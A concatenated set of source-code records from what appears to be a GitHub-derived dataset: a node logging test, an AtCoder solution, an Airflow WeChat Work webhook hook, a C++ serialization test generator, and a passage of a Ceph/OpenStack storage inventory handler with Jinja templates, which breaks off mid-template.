invdir = os.path.join(self.nodes[0].datadir, "regtest", "foo")
invalidname = os.path.join("foo", "foo.log")
self.stop_node(0)
self.assert_start_raises_init_error(0, ["-debuglogfile=%s" % (invalidname)],
"Error: Could not open debug log file")
assert not os.path.isfile(os.path.join(invdir, "foo.log"))
# check that invalid log (relative) works after path exists
self.stop_node(0)
os.mkdir(invdir)
self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
assert os.path.isfile(os.path.join(invdir, "foo.log"))
# check that invalid log (absolute) will cause error
self.stop_node(0)
invdir = os.path.join(self.options.tmpdir, "foo")
invalidname = os.path.join(invdir, "foo.log")
self.assert_start_raises_init_error(0, ["-debuglogfile=%s" % invalidname],
"Error: Could not open debug log file")
assert not os.path.isfile(os.path.join(invdir, "foo.log"))
# check that invalid log (absolute) works after path exists
self.stop_node(0)
os.mkdir(invdir)
self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
assert os.path.isfile(os.path.join(invdir, "foo.log"))
if __name__ == '__main__':
LoggingTest().main()
| 41.133333 | 90 | 0.636548 |
20829b16795378ba0e9ebb47dd6ddc4cbb65bb11 | 779 | py | Python | atcoder/corp/codefes2017_q1_c.py | knuu/competitive-programming | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | [
"MIT"
] | 1 | 2018-11-12T15:18:55.000Z | 2018-11-12T15:18:55.000Z | atcoder/corp/codefes2017_q1_c.py | knuu/competitive-programming | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | [
"MIT"
] | null | null | null | atcoder/corp/codefes2017_q1_c.py | knuu/competitive-programming | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | [
"MIT"
] | null | null | null | from collections import Counter
H, W = map(int, input().split())
cnt4, cnt2, cnt1 = 0, 0, 0
for v in Counter(''.join(input() for _ in range(H))).values():
if v % 4 == 0:
continue
elif v % 2 == 0:
cnt2 += 1
else:
cnt1 += 1
if (v - 1) % 4 != 0:
cnt2 += 1
odd = (H % 2 == 1) + (W % 2 == 1)
if odd == 2:
if cnt1 <= 1 and cnt2 <= (H + W - 2) // 2:
print("Yes")
else:
print("No")
elif odd == 1 and H % 2 == 1:
if cnt1 == 0 and cnt2 <= W // 2:
print("Yes")
else:
print("No")
elif odd == 1 and W % 2 == 1:
if cnt1 == 0 and cnt2 <= H // 2:
print("Yes")
else:
print("No")
else:
if cnt1 == 0 and cnt2 == 0:
print("Yes")
else:
print("No")
| 22.911765 | 62 | 0.428755 |
83184529a978685665cadcadfb79fdd10e2d603a | 5,275 | py | Python | airflow/contrib/hooks/qyweixin_hook.py | zzmg/airflow-dingding-qyweixin-1.10.3 | 8ebb5f80362df94996e5aa297299e7ff46a6f540 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2019-08-21T07:30:14.000Z | 2019-08-21T07:30:14.000Z | airflow/contrib/hooks/qyweixin_hook.py | zzmg/airflow-dingding-qyweixin-1.10.3 | 8ebb5f80362df94996e5aa297299e7ff46a6f540 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 6 | 2020-07-07T20:21:26.000Z | 2021-09-29T17:29:29.000Z | airflow/contrib/hooks/qyweixin_hook.py | langzi-zmg/airflow-dingding-qyweixin-1.10.3 | 8ebb5f80362df94996e5aa297299e7ff46a6f540 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import requests
from airflow import AirflowException
from airflow.hooks.http_hook import HttpHook
class QyweixinHook(HttpHook):
"""
This hook allows you send qyweixin message using qyweixin custom bot.
Get qyweixin token from conn_id.password. And prefer set domain to
conn_id.host, if not will use default ``https://oapi.dingtalk.com``.
For more detail message in
`qyweixin custom bot <https://open-doc.dingtalk.com/microapp/serverapi2/qf2nxq>`_
:param qyweixin_conn_id: The name of the qyweixin connection to use
:type qyweixin_conn_id: str
:param message_type: Message type you want to send to qyweixin, support five type so far
including text, link, markdown, actionCard, feedCard
:type message_type: str
:param message: The message send to qyweixin chat group
:type message: str or dict
:param at_mobiles: Remind specific users with this message
:type at_mobiles: list[str]
:param at_all: Remind all people in group or not. If True, will overwrite ``at_mobiles``
:type at_all: bool
"""
def __init__(self,
qyweixin_conn_id='qyweixin_default',
message_type='text',
message=None,
mentioned_list=None,
mentioned_mobile_list=None,
*args,
**kwargs
):
super(QyweixinHook, self).__init__(http_conn_id=qyweixin_conn_id, *args, **kwargs)
self.message_type = message_type
self.message = message
self.mentioned_list = mentioned_list
self.mentioned_mobile_list = mentioned_mobile_list
def _get_endpoint(self):
"""
Get qyweixin endpoint for sending message.
"""
conn = self.get_connection(self.http_conn_id)
token = conn.password
if not token:
raise AirflowException('qyweixin token is requests but get nothing, '
'check you conn_id configuration.')
return 'cgi-bin/webhook/send?key={}'.format(token)
def _build_message(self):
"""
Build different type of qyweixin message
As most commonly used type, text message just need post message content
rather than a dict like ``{'content': 'message'}``
"""
if self.message_type in ['text', 'markdown']:
data = {
'msgtype': self.message_type,
self.message_type: {
'content': self.message
}if self.message_type == 'text' else self.message,
'at': {
'mentioned_list': self.mentioned_list,
'mentioned_mobile_list': self.mentioned_mobile_list
}
}
else:
data = {
'msgtype': self.message_type,
self.message_type: self.message
}
return json.dumps(data)
def get_conn(self, headers=None):
"""
Overwrite HttpHook get_conn because just need base_url and headers and
not don't need generic params
:param headers: additional headers to be passed through as a dictionary
:type headers: dict
"""
conn = self.get_connection(self.http_conn_id)
self.base_url = conn.host if conn.host else 'https://qyapi.weixin.qq.com'
session = requests.Session()
if headers:
session.headers.update(headers)
return session
def send(self):
"""
Send qyweixin message
"""
support_type = ['text', 'link', 'markdown', 'actionCard', 'feedCard']
if self.message_type not in support_type:
raise ValueError('qyweixinWebhookHook only support {} '
'so far, but receive {}'.format(support_type, self.message_type))
data = self._build_message()
self.log.info('Sending qyweixin type %s message %s', self.message_type, data)
resp = self.run(endpoint=self._get_endpoint(),
data=data,
headers={'Content-Type': 'application/json'})
# qyweixin success send message will with errcode equal to 0
if int(resp.json().get('errcode')) != 0:
raise AirflowException('Send qyweixin message failed, receive error '
'message %s', resp.text)
self.log.info('Success Send qyweixin message')
| 39.365672 | 94 | 0.627109 |
f11d1040ca03d38ad6cd97a93dd79acde2b3ab5d | 9,286 | py | Python | messages/compiler/cpp/test_cppgen.py | sync-bft/concord-clone | fcc5a454ca16446f04351676f330df2382699929 | [
"Apache-2.0"
] | null | null | null | messages/compiler/cpp/test_cppgen.py | sync-bft/concord-clone | fcc5a454ca16446f04351676f330df2382699929 | [
"Apache-2.0"
] | null | null | null | messages/compiler/cpp/test_cppgen.py | sync-bft/concord-clone | fcc5a454ca16446f04351676f330df2382699929 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import math
import os
import random
import sys
from pprint import pprint
sys.path.append("..")
import cppgen
import cmfc
from exceptions import CmfParseError
from visitor import Visitor
from walker import Walker
MAX_SIZE = 5
OUTPUT_DIR = 'TEST_OUTPUT'
def randint():
return str(random.randint(0, 100))
def randstring():
return '"' + random.choice(["a", "b", "c", "aa", "bb", "cc", "abcdef"
]) + '"'
def byte_example():
return "{0,1,2,3,4,5}"
def instance_name(msg_name, id):
"""Generate the name of an instance from a msg name"""
return "_" + msg_name.lower() + str(id)
def test_name(msg_name):
"""Generate the name of a serialization unit test given a message name"""
return "test_{}_serialization".format(msg_name)
def type_instance_from_variable_instance(variable_instance):
"""
Take a generated variable instance and extract just the instance and type name for use inline
in other message instances
"""
# Get the type from the variable declaration
type_end = variable_instance.index(' ')
type = variable_instance[0:type_end]
# Strip off the type and instance name from the variable declaration, as well as the closing semicolon
instance_start = variable_instance.index('{')
return type + variable_instance[instance_start:-1]
class InstanceVisitor(Visitor):
"""
A visitor that generates instantiation of generated types along with serialization and
deserialization code.
"""
def __init__(self):
# How many elements to generate for nested types.
# This really isn't supported yet...
self.size = 0
# A dict keyed by a msg name that contains a set of generated instances of various sizes as strings
# This dict should be maintained across all instantiatiions of a single visitor
self.existing_instances = dict()
# The current msg name of the instance being generated
self.msg_name = ''
# The current msg instance being generated as a string
self.instance = ''
def msg_start(self, name, id):
self.msg_name = name
self.instance = f'{name} {instance_name(name, self.size)}{{'
if not name in self.existing_instances:
self.existing_instances[name] = []
def msg_end(self):
self.instance += '};'
self.existing_instances[self.msg_name].append(self.instance)
self.msg_name = ''
self.instance = ''
def field_start(self, name, type):
pass
def field_end(self):
self.instance += ","
def bool(self):
self.instance += random.choice(["true", "false"])
def uint8(self):
self.instance += randint()
def uint16(self):
self.instance += randint()
def uint32(self):
self.instance += randint()
def uint64(self):
self.instance += randint()
def int8(self):
self.instance += randint()
def int16(self):
self.instance += randint()
def int32(self):
self.instance += randint()
def int64(self):
self.instance += randint()
def string(self):
self.instance += randstring()
def bytes(self):
self.instance += byte_example()
def msgname_ref(self, name):
variable_instance = random.choice(self.existing_instances[name])
self.instance += type_instance_from_variable_instance(
variable_instance)
def kvpair_start(self):
self.instance += "{"
def kvpair_key_end(self):
self.instance += ","
def kvpair_end(self):
self.instance += "}"
def list_start(self):
self.instance += "{"
def list_end(self):
self.instance += "}"
# Map instances are tricky to generate. Uniform initialization of maps is done by lists of
# std::pairs, which themselves are represented as initializer lists. For this reason, we
# actually need to know when a map starts and ends so we can generate `self.size` numbers
# of std::pair initializer lists internally. This is further made complicated by the fact
# that maps can be nested. This latter part is true for lists as well.
#
# Unfortunately there is only one callback per type, and so we'd need to build up some
# datastructure that looks just like the AST being walked so we could easily generate multiple
# internal pairs. This just happens to be one of the cases where walking the AST directly for
# code generation is easier than using visitor callbacks. However, we use visitor callbacks to
# prevent tying us to a specific AST structure and needing to modify every single code
# generator.
#
# What we do because of this is just generate a single KV PAIR for now. Generating a single
# pair just means using double brackets for map_start and map_end. We can think of more
# sophisticated strategies later.
def map_start(self):
self.instance += "{{"
def map_key_end(self):
self.instance += ","
def map_end(self):
self.instance += "}}"
def optional_start(self):
self.instance += "{"
def optional_end(self):
self.instance += "}"
def oneof(self, msgs):
name = random.choice(list(msgs.keys()))
variable_instance = random.choice(self.existing_instances[name])
self.instance += type_instance_from_variable_instance(
variable_instance)
def testSerializationStr(msg_name):
"""
Create a function that roundtrip serializes and deserializes all instances of a given message type.
"""
s = "void {}() {{\n".format(test_name(msg_name))
for i in range(0, MAX_SIZE):
instance = instance_name(msg_name, i)
s += """
{{
std::vector<uint8_t> output;
serialize(output, {});
{} {}_computed;
deserialize(output, {}_computed);
assert({} == {}_computed);
}}
""".format(instance, msg_name, instance, instance, instance, instance)
s += "}\n"
return s
def file_header(namespace):
return """/***************************************
Autogenerated by test_cppgen.py. Do not modify.
***************************************/
#include "example.hpp"
#include <cassert>
namespace {} {{
""".format(namespace)
def file_trailer(namespace, ast):
s = """
}} // namespace {}
int main() {{
""".format(namespace)
for msg in ast.msgs:
s += " {}::{}();\n".format(namespace, test_name(msg.name))
s += "}"
return s
def generate_code_and_tests(ast, header_file):
""" Walk concord message format(CMF) AST and generate C++ code and C++ tests"""
namespace = "cmf::test"
print("Generating C++ Message structs and serialization code")
header, code = cppgen.translate(ast, header_file, namespace)
test_code = file_header(namespace)
print("Generating C++ message instances and serialization tests")
visitor = InstanceVisitor()
# We generate `max_size` msg instances for tests
for i in range(0, MAX_SIZE):
visitor.size = i
walker = Walker(ast, visitor)
walker.walk()
for msg_name, instances in visitor.existing_instances.items():
for instance in instances:
test_code += instance + "\n\n"
test_code += testSerializationStr(msg_name)
return header, code, test_code + file_trailer(namespace, ast)
def compile_cmf_lib():
print("Compiling CMF lib with g++")
os.system(
f"g++ -std=c++17 -g -c -fPIC -o {OUTPUT_DIR}/example.o {OUTPUT_DIR}/example.cpp"
)
os.system(
f"g++ -std=c++17 -shared -o {OUTPUT_DIR}/libexample.so {OUTPUT_DIR}/example.o"
)
def compile_tests():
print("Compiling tests with g++")
os.system(
f"g++ -std=c++17 -g -o {OUTPUT_DIR}/test_serialization -L{OUTPUT_DIR} {OUTPUT_DIR}/test_serialization.cpp -lexample"
)
def run_tests():
print("Running tests")
os.environ["LD_LIBRARY_PATH"] = OUTPUT_DIR
if os.system(f"./{OUTPUT_DIR}/test_serialization") == 0:
print("Tests passed.")
else:
print("Tests failed.")
def test_serialization():
"""
1. Generate C++ code for messages from example.cmf and write it to example.h.
2. Generate instances of the messages as well as tests that round trip serialize and deserialize them.
3. Compile that C++ code via g++
4. Run the compiled C++ code as a test
"""
with open("../grammar.ebnf") as f:
print("Reading ../grammar.ebnf")
grammar = f.read()
with open("../../example.cmf") as f2:
print("Reading ../../example.cmf")
cmf = f2.read()
ast, _ = cmfc.parse(grammar, cmf)
# Uncomment to show the generated AST for debugging purposes
# pprint(ast)
assert os.system(f'mkdir -p {OUTPUT_DIR}') == 0
header, code, tests = generate_code_and_tests(ast, "example.hpp")
with open(f"{OUTPUT_DIR}/example.hpp", "w") as f:
f.write(header)
with open(f"{OUTPUT_DIR}/example.cpp", "w") as f:
f.write(code)
with open(f"{OUTPUT_DIR}/test_serialization.cpp", "w") as f:
f.write(tests)
compile_cmf_lib()
compile_tests()
run_tests()
if __name__ == "__main__":
test_serialization()
| 30.149351 | 124 | 0.63655 |
d8a74a5fdc1484aabbe5d6736c27c87b2464123a | 55,277 | py | Python | inventoryhandlers/storageinventory/storageinventory.py | alexandruavadanii/cm-plugins | 5c3f9f389f46f719579ac4cd4065490b1723ebff | [
"Apache-2.0"
] | null | null | null | inventoryhandlers/storageinventory/storageinventory.py | alexandruavadanii/cm-plugins | 5c3f9f389f46f719579ac4cd4065490b1723ebff | [
"Apache-2.0"
] | null | null | null | inventoryhandlers/storageinventory/storageinventory.py | alexandruavadanii/cm-plugins | 5c3f9f389f46f719579ac4cd4065490b1723ebff | [
"Apache-2.0"
] | 1 | 2021-04-24T16:48:17.000Z | 2021-04-24T16:48:17.000Z | # Copyright 2019 Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring,invalid-name,too-few-public-methods,too-many-instance-attributes,too-many-lines
import os
import json
import subprocess
from jinja2 import Environment
from cmframework.apis import cmansibleinventoryconfig
from cmframework.apis import cmerror
from cmdatahandlers.api import configerror
from serviceprofiles import profiles
import hw_detector.hw_detect_lib as hw
import math
NEAREST_POWER_OF_2_PERCENTAGE = 0.25
TARGET_PGS_PER_OSD_NO_INCREASE_EXPECTED = 100
TARGET_PGS_PER_OSD_UP_TO_DOUBLE_SIZE_INCREASE_EXPECTED = 200
TARGET_PGS_PER_OSD_TWO_TO_THREE_TIMES_SIZE_INCREASE_EXPECTED = 300
# Please visit ceph.com/pgcalc for details on previous values
MINIMUM_PG_NUM = 32
class PGNum(object):
"""Calculates the pg_num for the given attributes."""
def __init__(self, number_of_pool_osds, pool_data_percentage, number_of_replicas):
self._number_of_pool_osds = number_of_pool_osds
self._pool_data_percentage = pool_data_percentage
self._number_of_replicas = number_of_replicas
@staticmethod
def _round_up_to_closest_power_of_2(num):
"""Smallest power of 2 greater than or equal to num."""
return 2**(num-1).bit_length() if num > 0 else 1
@staticmethod
def _round_down_to_closest_power_of_2(num):
"""Largest power of 2 less than or equal to num."""
return 2**(num.bit_length()-1) if num > 0 else 1
@staticmethod
def _check_percentage_of_values(diff_to_lower, org_pgnum):
""" If the nearest power of 2 is more than 25% below the original value,
the next higher power of 2 is used. Please visit ceph.com/pgcalc
"""
return float(float(diff_to_lower) / float(org_pgnum)) > NEAREST_POWER_OF_2_PERCENTAGE
def _rounded_pgnum_to_the_nearest_power_of_2(self, pgnum):
higher_power = self._round_up_to_closest_power_of_2(pgnum)
lower_power = self._round_down_to_closest_power_of_2(pgnum)
diff_to_lower = pgnum - lower_power
if pgnum != 0 and self._check_percentage_of_values(diff_to_lower, pgnum):
return higher_power
return lower_power
def _calculate_pg_num_formula(self, number_of_pool_osds, pool_percentage):
return TARGET_PGS_PER_OSD_UP_TO_DOUBLE_SIZE_INCREASE_EXPECTED \
* number_of_pool_osds * float(pool_percentage) / self._number_of_replicas
def _select_pgnum_formula_result(self, number_of_pool_osds, pool_percentage):
pgnum = self._calculate_pg_num_formula(number_of_pool_osds, pool_percentage)
return int(math.ceil(max(pgnum, MINIMUM_PG_NUM)))
def calculate(self):
""" The formula of the calculation can be found from ceph.com/pgcalc.
pgnum = (target_pgs x number_of_osds_in_pool x pool_percentage)/number_of_replicas
return : rounded pgnum to the nearest power of 2
"""
pgnum = self._select_pgnum_formula_result(
self._number_of_pool_osds, self._pool_data_percentage)
return self._rounded_pgnum_to_the_nearest_power_of_2(pgnum)
NUMBER_OF_POOLS = 4
SUPPORTED_INSTANCE_BACKENDS = ['default', 'cow', 'lvm']
ALL_DEFAULT_INSTANCE_BACKENDS = SUPPORTED_INSTANCE_BACKENDS + ['rbd']
DEFAULT_INSTANCE_LV_PERCENTAGE = "100"
USER_SECRETS = "/etc/openstack_deploy/user_secrets.yml"
# Ceph PG share percentages for Openstack pools
OSD_POOL_IMAGES_PG_NUM_PERCENTAGE = 0.09
OSD_POOL_VOLUMES_PG_NUM_PERCENTAGE = 0.69
OSD_POOL_VMS_PG_NUM_PERCENTAGE = 0.20
OSD_POOL_SHARED_PG_NUM_PERCENTAGE = 0.02
# Ceph PG share percentages for CaaS pools
OSD_POOL_CAAS_PG_NUM_PERCENTAGE = 1.0
DEFAULT_ROOTDISK_DEVICE = "/dev/sda"
# root disk partition 2 system volume group VG percentages
INSTANCE_NODE_VG_PERCENTAGE = 0.47
NOT_INSTANCE_NODE_VG_PERCENTAGE = 1
"""
/dev/sda1 fixed partition size : 50GiB fixed size = 10% of the total disk size
/dev/sda2 system VG partition size: 47% of remaining total disk size = 42% of total disk size
/dev/sda3 instance partition size 53% of remaining total disk size = 47% of total disk size
"""
JSON_EXTERNAL_CEPH_CINDER_BACKEND_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"ext_ceph_user": "{{ ext_ceph_user }}",
"ext_ceph_user_key": "{{ ext_ceph_user_key }}",
"cephkeys_access_group": "cephkeys",
"ceph_mons": [
{% for host in hosts %}
"{{ host.name }}"
{% if not loop.last %},{% endif %}
{% endfor %}],
"ext_ceph_fsid": "{{ ext_ceph_fsid }}",
"ext_ceph_mon_hosts": "{{ ext_ceph_mon_hosts }}",
"cinder_service_hostname": "{{ host.name }}",
"cinder_backends": {
"rbd": {
"volume_driver": "cinder.volume.drivers.rbd.RBDDriver",
"rbd_pool": "{{ cinder_pool_name }}",
"rbd_ceph_conf": "/etc/ceph/ceph.conf",
"ceph_conf": "/etc/ceph/ceph.conf",
"rbd_flatten_volume_from_snapshot": "false",
"rbd_max_clone_depth": "5",
"rbd_store_chunk_size": "4",
"rados_connect_timeout": "-1",
"volume_backend_name": "RBD",
"rbd_secret_uuid": "{{ cinder_ceph_client_uuid }}",
"rbd_user": "{{ ext_ceph_user }}",
"backend_host": "controller",
"rbd_exclusive_cinder_pool": "True"
}
},
"ext_openstack_pools": [
"{{ glance_pool_name }}",
"{{ cinder_pool_name }}",
"{{ nova_pool_name }}",
"{{ platform_pool_name }}"
],
"cinder_ceph_client": "{{ ext_ceph_user }}",
"nova_ceph_client": "{{ ext_ceph_user }}",
"glance_default_store": "rbd",
"glance_additional_stores": ["http", "cinder", "file"],
"glance_rbd_store_pool": "{{ glance_pool_name }}",
"glance_rbd_store_chunk_size": "8",
"glance_ceph_client": "{{ ext_ceph_user }}",
"ceph_conf": "/etc/ceph/ceph.conf"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_CINDER_BACKENDS_HOST_VAR = """
{
{%- set loopvar = {'first_entry': True} %}
{% for host in hosts %}
{% if host.is_controller %}
{%- if not loopvar.first_entry %},{%- endif %}
{%- if loopvar.update({'first_entry': False}) %}{%- endif %}
"{{ host.name }}": {
"cinder_service_hostname": "{{ host.name }}",
"cinder_backends": {
{% if openstack_storage == 'ceph' %}
"rbd": {
"volume_driver": "cinder.volume.drivers.rbd.RBDDriver",
"rbd_pool": "{{ cinder_pool_name }}",
"rbd_ceph_conf": "/etc/ceph/ceph.conf",
"ceph_conf": "/etc/ceph/ceph.conf",
"rbd_flatten_volume_from_snapshot": "false",
"rbd_max_clone_depth": "5",
"rbd_store_chunk_size": "4",
"rados_connect_timeout": "-1",
"volume_backend_name": "volumes_hdd",
"rbd_secret_uuid": "{{ cinder_ceph_client_uuid }}",
"rbd_user": "cinder",
"backend_host": "controller",
"rbd_exclusive_cinder_pool": "True"
}
{% endif %}
{% if openstack_storage == 'lvm' %}
"lvm": {
"iscsi_ip_address": "{{ installation_controller_ip }}",
"volume_backend_name": "LVM_iSCSI",
"volume_driver": "cinder.volume.drivers.lvm.LVMVolumeDriver",
"volume_group": "cinder-volumes"
}
{% endif %}
}
}
{% endif %}
{% endfor %}
}
"""
JSON_STORAGE_HOST_VAR = """
{
{%- set loopvar = {'first_entry': True} %}
{% for host in hosts %}
{% if host.is_rbd_ceph %}
{%- if not loopvar.first_entry %},{%- endif %}
{%- if loopvar.update({'first_entry': False}) %}{%- endif %}
"{{ host.name }}": {
"devices": [
{% for disk in host.ceph_osd_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}]
}
{% endif %}
{% endfor %}
}
"""
JSON_STORAGE_HOST_DISK_CONFIGURATION = """
{
{% for host in hosts %}
"{{ host.name }}": {
"by_path_disks":
{ "os" : "{{ host.os_disk }}",
"osd" : "{{ host.ceph_osd_disks }}",
"osd_disks_ids" : "{{ host.osd_disks_ids }}"
},
"rootdisk_vg_percentage": "{{ host.vg_percentage }}",
"default_rootdisk_device": "{{ rootdisk_device }}"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_LVM_STORAGE_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"devices": [
{% for disk in host.cinder_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}],
"cinder_physical_volumes": [
{% for disk in host.cinder_physical_volumes %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}]
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_BARE_LVM_STORAGE_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
{% if host.is_bare_lvm %}
"bare_lvm": {
"disks": [
{% for disk in host.bare_lvm_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}],
"physical_volumes": [
{% for disk in host.bare_lvm_physical_volumes %}
"{{disk}}"
{%if not loop.last %},{% endif %}{% endfor %}],
"mount_options": "{{ host.mount_options }}",
"mount_dir": "{{ host.mount_dir }}",
"name": "{{ host.bare_lvm_lv_name }}"
}
{% endif %}
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_DEVICE_HOST_VAR = """
{
{%- set loopvar = {'first_entry': True} %}
{% for host in hosts %}
{% if host.instance_physical_volumes %}
{%- if not loopvar.first_entry %},{%- endif %}
{%- if loopvar.update({'first_entry': False}) %}{%- endif %}
"{{ host.name }}": {
"instance_disks": [
{% for disk in host.instance_disks %}
"{{disk}}"
{%if not loop.last %},{% endif %}
{% endfor %}],
"instance_physical_volumes": [
{% for disk in host.instance_physical_volumes %}
"{{disk}}"
{%if not loop.last %},{% endif %}
{% endfor %}],
"instance_lv_percentage": "{{ host.instance_lv_percentage }}"
}
{% endif %}
{% endfor %}
}
"""
# /etc/ansible/roles/os_nova/templates/nova.conf.j2
JSON_NOVA_RBD_HOST_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"nova_libvirt_images_rbd_pool": "{{ nova_pool_name }}",
"nova_ceph_client": "{{ nova_ceph_client }}"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
#
# /opt/ceph-ansible/group_vars/osds.yml
JSON_OVERRIDE = """
{
"ceph_conf_overrides": {
"global": {
"mon_max_pg_per_osd": "400",
"mon_pg_warn_max_object_skew": "-1",
"osd_pool_default_size": "{{ osd_pool_default_size }}",
"osd_pool_default_min_size": "{{ osd_pool_default_min_size }}",
"osd_pool_default_pg_num": "{{ osd_pool_default_pg_num }}",
"osd_pool_default_pgp_num": "{{ osd_pool_default_pg_num }}",
"osd_heartbeat_grace": "3",
"osd_heartbeat_interval": "2",
"mon_osd_min_down_reporters": "1",
"mon_osd_adjust_heartbeat_grace": "false",
"auth_client_required": "cephx"
},
"mgr": {
"mgr_modules": "dashboard"
},
"mon": {
"mon_health_preluminous_compat_warning": "false",
"mon_health_preluminous_compat": "true",
"mon_timecheck_interval": "60",
"mon_sd_reporter_subtree_level": "device",
"mon_clock_drift_allowed": "0.1"
},
"osd": {
"osd_mon_heartbeat_interval": "10",
"osd_mon_report_interval_min": "1",
"osd_mon_report_interval_max": "15"
}
}
}
"""
JSON_OVERRIDE_CACHE = """
{
"ceph_conf_overrides": {
"global": {
"mon_max_pg_per_osd": "400",
"mon_pg_warn_max_object_skew": "-1",
"osd_pool_default_size": "{{ osd_pool_default_size }}",
"osd_pool_default_min_size": "{{ osd_pool_default_min_size }}",
"osd_pool_default_pg_num": "{{ osd_pool_default_pg_num }}",
"osd_pool_default_pgp_num": "{{ osd_pool_default_pg_num }}",
"osd_heartbeat_grace": "3",
"osd_heartbeat_interval": "2",
"mon_osd_adjust_heartbeat_grace": "false",
"bluestore_cache_size": "1073741824",
"auth_client_required": "cephx"
},
"mgr": {
"mgr_modules": "dashboard"
},
"mon": {
"mon_health_preluminous_compat_warning": "false",
"mon_health_preluminous_compat": "true",
"mon_timecheck_interval": "60",
"mon_sd_reporter_subtree_level": "device",
"mon_clock_drift_allowed": "0.1"
},
"osd": {
"osd_mon_heartbeat_interval": "10",
"osd_mon_report_interval_min": "1",
"osd_mon_report_interval_max": "15"
}
}
}
"""
JSON_OVERRIDE_3CONTROLLERS = """
{
"ceph_conf_overrides": {
"global": {
"mon_max_pg_per_osd": "400",
"mon_pg_warn_max_object_skew": "-1",
"osd_pool_default_size": "{{ osd_pool_default_size }}",
"osd_pool_default_min_size": "{{ osd_pool_default_min_size }}",
"osd_pool_default_pg_num": "{{ osd_pool_default_pg_num }}",
"osd_pool_default_pgp_num": "{{ osd_pool_default_pg_num }}",
"osd_heartbeat_grace": "3",
"osd_heartbeat_interval": "2",
"mon_osd_adjust_heartbeat_grace": "false",
"bluestore_cache_size": "1073741824",
"auth_client_required": "cephx"
},
"mgr": {
"mgr_modules": "dashboard"
},
"mon": {
"mon_health_preluminous_compat_warning": "false",
"mon_health_preluminous_compat": "true",
"mon_lease": "1.0",
"mon_election_timeout": "2",
"mon_lease_renew_interval_factor": "0.4",
"mon_lease_ack_timeout_factor": "1.5",
"mon_timecheck_interval": "60",
"mon_sd_reporter_subtree_level": "device",
"mon_clock_drift_allowed": "0.1"
},
"osd": {
"osd_mon_heartbeat_interval": "10",
"osd_mon_report_interval_min": "1",
"osd_mon_report_interval_max": "15"
}
}
}
"""
JSON_NETWORK = """
{
"public_network": "{{ public_networks }}",
"cluster_network": "{{ cluster_networks }}"
}
"""
JSON_OS_TUNING = """
{
"os_tuning_params": [{
"name": "vm.min_free_kbytes",
"value": "1048576"
}]
}
"""
JSON_OSD_POOL_PGNUMS = """
{
"osd_pool_images_pg_num": "{{ osd_pool_images_pg_num }}",
"osd_pool_volumes_pg_num": "{{ osd_pool_volumes_pg_num }}",
"osd_pool_vms_pg_num": "{{ osd_pool_vms_pg_num }}",
"osd_pool_shared_pg_num": "{{ osd_pool_shared_pg_num }}"{%- if 0 < osd_pool_caas_pg_num %},
"osd_pool_caas_pg_num": "{{ osd_pool_caas_pg_num }}"
{% endif %}
}
"""
JSON_CEPH_HOSTS = """
{
"ceph-mon": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-mon_hosts": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"mons": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph_mons": [ {% for host in mons %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-osd": [ {% for host in osds %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-osd_hosts": [ {% for host in osds %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"osds": [ {% for host in osds %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"mgrs": [ {% for host in mgrs %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ],
"ceph-mgr": [ {% for host in mgrs %}"{{ host.name }}"{% if not loop.last %},{% endif %}{% endfor %} ]
}
"""
# "storage_backend": ceph
# Replaces variables in /opt/openstack-ansible/playbooks/inventory/group_vars/glance_all.yml
JSON_GLANCE_CEPH_ALL_GROUP_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"glance_default_store": "rbd",
"glance_additional_stores": ["http", "cinder", "file"],
